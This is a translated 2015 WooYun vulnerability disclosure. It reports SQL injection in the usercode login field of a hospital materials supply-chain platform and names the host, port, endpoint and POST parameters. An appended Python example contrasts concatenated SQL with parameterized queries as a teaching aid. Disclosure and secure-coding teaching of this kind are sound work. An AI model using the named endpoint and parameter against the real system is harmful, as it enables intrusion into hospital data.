
Vulnerability summary

Defect ID: wooyun-2015-0131487

Title: SQL injection in the Tute (图特) Hospital Materials Supply Chain Management Platform (30 databases)

Affected vendor: hspcn.net

Author: wps2015

Submitted: 2015-08-04 11:46

Fixed: 2015-09-18 12:06

Published: 2015-09-18 12:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-08-04: Details sent to the vendor; awaiting the vendor's handling
2015-08-04: Vendor confirmed; details disclosed to the vendor only
2015-08-14: Details disclosed to core white hats and domain experts
2015-08-24: Details disclosed to regular white hats
2015-09-03: Details disclosed to intern white hats
2015-09-18: Details disclosed to the public

Brief description:

Still a small vendor?

Details:

The problem is in the login at http://hspcn.net:8000/home/Account/

(screenshot: 20.png)


Payload:

POST: hspcn.net:8000/home/Account/ValidateLogOn
data:usercode=fdsf&password=sfsd


The injectable parameter is usercode; there are 30 databases in total.

(screenshot: 21.png)


Current database: HOPESHARE_S2YY

Database: HOPESHARE_S2YY
[220 tables]


The database contents can be dumped.

(screenshot: 22.png)


Proof of vulnerability:

(screenshot: 22.png)

Fix:

Filter the input.
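To make the root cause concrete, here is an added example (not code from the report or from the vendor's platform) of a ValidateLogOn-style check in its injectable form beside a parameterized form. It assumes a constructed in-memory SQLite store with a PUB_USER table (name borrowed from the report's table listing; the USERCODE and PW_HASH columns are assumed), and shows that a single quote in usercode changes the query's structure in the concatenated version but is treated as plain data once placeholders are used.

```python
import hashlib
import hmac
import sqlite3


def pw_hash(password: str) -> str:
    # Stand-in hash for the demo only; a real deployment needs a slow, salted KDF.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one account in a PUB_USER table (columns assumed).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PUB_USER (USERCODE TEXT PRIMARY KEY, PW_HASH TEXT)")
    conn.execute("INSERT INTO PUB_USER VALUES (?, ?)", ("alice", pw_hash("correct-horse")))
    conn.commit()
    return conn


def validate_logon_unsafe(conn: sqlite3.Connection, usercode: str, password: str) -> bool:
    # The pattern the report implies: the request field is spliced into the SQL text,
    # so any quote or operator inside usercode becomes part of the statement.
    sql = "SELECT PW_HASH FROM PUB_USER WHERE USERCODE = '" + usercode + "'"
    row = conn.execute(sql).fetchone()
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))


def validate_logon_safe(conn: sqlite3.Connection, usercode: str, password: str) -> bool:
    # Hardened form: the statement shape is fixed before any input is seen and
    # usercode is bound as a value, so quotes in it can only affect the comparison.
    sql = "SELECT PW_HASH FROM PUB_USER WHERE USERCODE = ?"
    row = conn.execute(sql, (usercode,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))


def input_alters_query(conn: sqlite3.Connection, usercode: str) -> bool:
    # True when the concatenated query fails to parse, i.e. the input was
    # interpreted as SQL rather than as the value being compared.
    try:
        validate_logon_unsafe(conn, usercode, "any-password")
        return False
    except sqlite3.OperationalError:
        return True
```

A database error surfacing from the login handler for inputs containing a quote is the same signal that made the usercode parameter detectable here; the parameterized version never produces it.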

Copyright notice: when republishing, please credit the source: wps2015@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-04 12:06

Vendor reply:

Much the same as issues already reported by other white hats; they are being handled together.

Latest status:

None yet

